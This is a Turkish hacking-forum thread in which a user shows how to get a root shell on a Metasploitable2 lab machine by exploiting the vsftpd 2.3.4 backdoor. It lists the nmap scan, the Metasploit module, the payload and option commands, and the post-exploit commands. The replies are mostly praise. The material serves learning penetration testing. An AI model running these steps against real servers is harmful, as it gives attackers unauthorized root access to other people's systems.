FTP Sunucu Hackleme (NMAP)

Discussion in 'Hack Dökümanları - Hack Articles' started by Kirito1337, Nov 1, 2017.

  1. Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    758
    Likes Received:
    803
    Görünebilir içerik (Unhidden content):

    Bu konuda, FTP protokolü üzerinde ki "vsftpd 2.3.4" uygulamasını exploit ederek hedef sistemde root yetkisine çıkmayı göstereceğim.

    Sızma Testi senaryosunu gerçekleştirirken, laborotatuvar ortamı olarak, "métasploitable2-Linux" sistemini kullandım.

    Artık anlatıma geçelim.

    Öncelikle hedef sunucumuzda bir nmap ile port taraması yaparak keşif çalışmamızı yapalım.

    "nmap -sV 192.168.127.130" hedef sunucumuzun İP adresidir.


    Tarama sonucunda gördüğünüz gibi, FTP protokolü üzerinde, "vsftpd 2.3.4" uygulaması çalışmakta.

    Biz de bunu kullanarak hedef sunucuya sızabiliriz.

    Açalım bakalım, métasploit framework’ ümüzü

    "msfconsole" diyerek açıyoruz.


    search vsftpd" komutunu girerek explotimizi aradık.

    "use exploit/unix/ftp/vsftpd_234_backdoor" exploitimize giriyoruz.

    "show payloads" komutu ile exploite uygun payloadları arıyoruz ve "cmd/unix/interact" payloadını seçiyoruz.


    ardından, "show options" komutunu girerek, genel ayarları yapıyoruz.

    "set RHOST 192.168.127.130" ve "set RPORT 21" bilgilerini girerek exploiti çalıştırıyoruz.


    exploit sonucunda, hedef sistemde root yetkisi kazanmış olduk.

    UID: uid=0(root) gid=0(root)

    görüldüğü üzere, "command shell session 1 opened" 1 shell oturumu açıldı. Artık linux komutlarıı çalıştırabiliriz. Gerisi
    size kalmış.

    "whoami" komutunu girdim, "root" çıktısını aldım. Bu demek oluyorki sen root kullanıcısısın artık.

    "uname -a" komutu ile hedef sistemin kernel sürümünü öğrendim.

    "ls" komutu ile bulunduğum dizinin dosyalarını listeledim. Ve çok şey yapabiliriz.
    SON ;)
    [​IMG]
     
  2. crayz10

    crayz10

    Mesajlar:
    276
    Likes Received:
    63
    eline sağlık
     
  3. Alparslan

    Alparslan r00t

    Mesajlar:
    771
    Likes Received:
    661
    keşke bu kadar kolay olsa :D
     
  4. Konu Sahibi
    Konu Sahibi
    Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    758
    Likes Received:
    803
    Kolay Zaten :) Yeterki Exploit Açığı Olsun Hedefde..
     
    GÖK-TÜRK likes this.
  5. Alparslan

    Alparslan r00t

    Mesajlar:
    771
    Likes Received:
    661
    Exploit açığı olduktan sonra kolay zaten de açığı olanı bulmak zor diyelim.
     
    Kirito1337 likes this.
  6. aSENSE

    aSENSE Genel Kurmay Başkanı

    Mesajlar:
    647
    Likes Received:
    712
    eline sağlık bu arada buldum :3131 gibi hacklemeyi :D
     
  7. MileFires

    MileFires

    Mesajlar:
    17
    Likes Received:
    1
  8. NightShade

    NightShade

    Mesajlar:
    133
    Likes Received:
    29
  9. R4koo 118

    R4koo 118

    Mesajlar:
    51
    Likes Received:
    12
    Eline Saglik
     
  10. Konu Sahibi
    Konu Sahibi
    Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    758
    Likes Received:
    803
    Güzel Yorumlarınız İçin Teşekkürler Spy Ailesi. :)
     
  11. x0rcp

    x0rcp

    Mesajlar:
    29
    Likes Received:
    0
    teşekkürler
     
  12. ProSkyTR

    ProSkyTR

    Mesajlar:
    778
    Likes Received:
    257
    Eline sağlık gardaşım
     
  13. ChatLak

    ChatLak

    Mesajlar:
    49
    Likes Received:
    25
    Eline Saglik
     
  14. Marowit

    Marowit

    Mesajlar:
    871
    Likes Received:
    823
    Eline falan sağlık
     
  15. Konu Sahibi
    Konu Sahibi
    Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    758
    Likes Received:
    803
    Okuyan Gözüne Filan Sağlık. (!) :D
     
  16. blacksystem

    blacksystem

    Mesajlar:
    54
    Likes Received:
    13
    bakalım
     
  17. verder

    verder

    Mesajlar:
    4
    Likes Received:
    0
    Yararli
     
  18. daty0009

    daty0009

    Mesajlar:
    87
    Likes Received:
    4
  19. Açelya

    Açelya

    Mesajlar:
    35
    Likes Received:
    21
    eline sağlık
     
  20. TheCruelty

    TheCruelty

    Mesajlar:
    94
    Likes Received:
    21
    Eline Sağlık
     
Loading...